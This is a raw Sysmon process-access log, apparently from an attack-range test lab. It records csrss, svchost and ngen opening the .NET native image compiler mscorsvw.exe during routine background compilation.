13:50:13.416{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.416{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.322{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.322{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.275{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.197{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.181{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.181{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.134{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.088{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.009{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.009{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
